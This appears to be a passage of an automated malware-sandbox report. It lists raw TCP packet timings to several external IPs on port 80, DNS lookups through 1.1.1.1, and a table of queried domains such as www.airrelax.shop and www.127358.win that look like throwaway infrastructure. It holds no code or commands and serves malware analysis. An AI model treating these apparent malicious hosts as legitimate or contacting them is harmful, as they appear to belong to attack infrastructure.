                                                                                                                                                Nov 25, 2024 09:45:09.899029016 CET5004680192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:09.914906979 CET5004680192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:10.035309076 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.035330057 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.035351992 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.035397053 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.035407066 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.036314964 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.036324024 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.036392927 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.036402941 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:11.241317987 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:11.241446972 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:11.241502047 CET5004680192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:11.416609049 CET5004680192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:12.436935902 CET5004780192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:12.556468964 CET8050047185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:12.556571960 CET5004780192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:12.568989038 CET5004780192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:12.688554049 CET8050047185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:13.851711988 CET8050047185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:13.851903915 CET8050047185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:13.852045059 CET5004780192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:13.856368065 CET5004780192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:13.975778103 CET8050047185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:20.746545076 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:20.866189957 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:20.866293907 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:20.884491920 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:21.004081964 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341161966 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341178894 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341228962 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.341305017 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341316938 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341327906 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341339111 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341351032 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341351986 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.341363907 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341376066 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341388941 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.341391087 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.341408968 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.341454029 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.400981903 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.460918903 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.460974932 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.460988045 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.461026907 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.508954048 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.508999109 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:22.509027004 CET8050048163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:22.509082079 CET5004880192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:23.420397043 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:23.540185928 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:23.540710926 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:23.555538893 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:23.675065994 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.967727900 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.967768908 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.967780113 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.967807055 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:24.967899084 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.967930079 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.967941046 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:24.967943907 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.967958927 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.967988968 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:24.967994928 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.968008041 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.968019962 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:24.968029976 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:24.968060017 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.057205915 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.087276936 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.087337017 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.087354898 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.087395906 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.137680054 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.137716055 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.137727976 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.137753010 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.159512997 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.159560919 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.159612894 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.159652948 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.163700104 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.163742065 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.165182114 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.165221930 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.165282011 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.165324926 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:25.172060966 CET8050049163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:25.172111034 CET5004980192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:26.076056004 CET5005080192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:26.195658922 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.195756912 CET5005080192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:26.212435961 CET5005080192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:26.332144976 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.332159996 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.332184076 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.332194090 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.332297087 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.332318068 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.332341909 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.332353115 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:26.332392931 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:27.713507891 CET5005080192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:27.833374977 CET8050050163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:27.833494902 CET5005080192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:28.739641905 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:28.859230995 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:28.859322071 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:28.870351076 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:28.989989042 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299025059 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299062967 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299082994 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299096107 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299107075 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299118042 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299141884 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299154997 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299166918 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299173117 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.299304008 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:30.299304008 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:30.419013023 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.419120073 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.419240952 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:30.423110008 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.481297970 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:30.490719080 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.490823030 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.490933895 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:30.494884014 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.494980097 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.495044947 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:30.501363039 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.501424074 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:30.501494884 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:30.548580885 CET5005180192.168.2.4163.44.185.183
                                                                                                                                                Nov 25, 2024 09:45:30.668250084 CET8050051163.44.185.183192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:36.214795113 CET5005280192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:36.334347010 CET8050052217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:36.336540937 CET5005280192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:36.356439114 CET5005280192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:36.560375929 CET8050052217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:37.664650917 CET8050052217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:37.664778948 CET8050052217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:37.664789915 CET8050052217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:37.664917946 CET5005280192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:37.854206085 CET5005280192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:38.873322964 CET5005380192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:38.992897987 CET8050053217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:38.992976904 CET5005380192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:39.011440039 CET5005380192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:39.131093979 CET8050053217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:40.365125895 CET8050053217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:40.365235090 CET8050053217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:40.365247011 CET8050053217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:40.365320921 CET5005380192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:40.526094913 CET5005380192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:41.545245886 CET5005480192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:41.664951086 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.665086985 CET5005480192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:41.680648088 CET5005480192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:41.800395012 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.800412893 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.800430059 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.800497055 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.800561905 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.800580025 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.800715923 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.800729036 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:41.800745010 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:43.090595961 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:43.090739012 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:43.090756893 CET8050054217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:43.090802908 CET5005480192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:43.090890884 CET5005480192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:43.182276964 CET5005480192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:44.202023983 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:44.480539083 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:44.480618000 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:44.569355011 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:44.688949108 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806469917 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806530952 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806576014 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806618929 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806704044 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:45.806704044 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:45.806710005 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806799889 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:45.812464952 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:45.931976080 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:52.085829020 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:52.205507040 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:52.206675053 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:52.221162081 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:52.340811968 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:53.457506895 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:53.457541943 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:53.457556963 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:53.457941055 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:53.729157925 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:54.749511957 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:54.869066954 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:54.869155884 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:54.887394905 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:55.006968975 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:56.165836096 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:56.165909052 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:56.165923119 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:56.166119099 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:56.401070118 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:57.442753077 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:57.562331915 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.562457085 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:57.578844070 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:57.698550940 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698570013 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698626041 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698636055 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698709965 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698776007 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698786020 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698873997 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698884010 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:58.766074896 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:58.766140938 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:58.766155005 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:58.766191959 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:58.766237974 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:59.088553905 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:00.107939959 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:00.227518082 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:00.227742910 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:00.236850023 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:00.356594086 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:01.479526043 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:01.479587078 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:01.479615927 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:01.480359077 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:01.483345985 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:01.603518009 CET8050059107.167.84.42192.168.2.4

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 25, 2024 09:42:28.819562912 CET6228253192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:42:29.186005116 CET53622821.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:45.890445948 CET5991053192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:42:46.582037926 CET53599101.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:01.029290915 CET6116153192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:43:02.028917074 CET53611611.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:16.545543909 CET6327753192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:43:17.385299921 CET53632771.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:32.350215912 CET6509253192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:43:33.353872061 CET6509253192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:43:33.367620945 CET53650921.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:33.490792990 CET53650921.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:48.264683008 CET4983053192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:43:48.600311041 CET53498301.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:03.077070951 CET6552253192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:44:03.657198906 CET53655221.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:18.189596891 CET5536753192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:44:18.848118067 CET53553671.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:33.780257940 CET5663953192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:44:34.100106001 CET53566391.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:48.827408075 CET6122653192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:44:49.232960939 CET53612261.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:03.701390982 CET5939053192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:45:04.441714048 CET53593901.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:18.890425920 CET5319853192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:45:19.904392004 CET5319853192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:45:20.743444920 CET53531981.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:20.743462086 CET53531981.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:35.561322927 CET6478953192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:45:36.210143089 CET53647891.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:50.827177048 CET5000253192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:45:51.824491024 CET5000253192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:45:52.082026005 CET53500021.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:52.082050085 CET53500021.1.1.1192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:07.217420101 CET5372753192.168.2.41.1.1.1
                                                                                                                                                Nov 25, 2024 09:46:07.965703964 CET53537271.1.1.1192.168.2.4

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Nov 25, 2024 09:42:28.819562912 CET192.168.2.41.1.1.10x1573Standard query (0)www.airrelax.shopA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:42:45.890445948 CET192.168.2.41.1.1.10x8849Standard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:01.029290915 CET192.168.2.41.1.1.10x6db2Standard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:16.545543909 CET192.168.2.41.1.1.10xfe52Standard query (0)www.127358.winA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:32.350215912 CET192.168.2.41.1.1.10x6a92Standard query (0)www.caj-bioteaque.onlineA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:33.353872061 CET192.168.2.41.1.1.10x6a92Standard query (0)www.caj-bioteaque.onlineA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:48.264683008 CET192.168.2.41.1.1.10x2fbeStandard query (0)www.ssrpidemt-soar.sbsA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:03.077070951 CET192.168.2.41.1.1.10x2517Standard query (0)www.izmirescortg.xyzA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:18.189596891 CET192.168.2.41.1.1.10x8fc2Standard query (0)www.030002613.xyzA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:33.780257940 CET192.168.2.41.1.1.10xace2Standard query (0)www.327531.buzzA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:48.827408075 CET192.168.2.41.1.1.10x5b9dStandard query (0)www.urbanfashion.websiteA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:03.701390982 CET192.168.2.41.1.1.10x86eStandard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
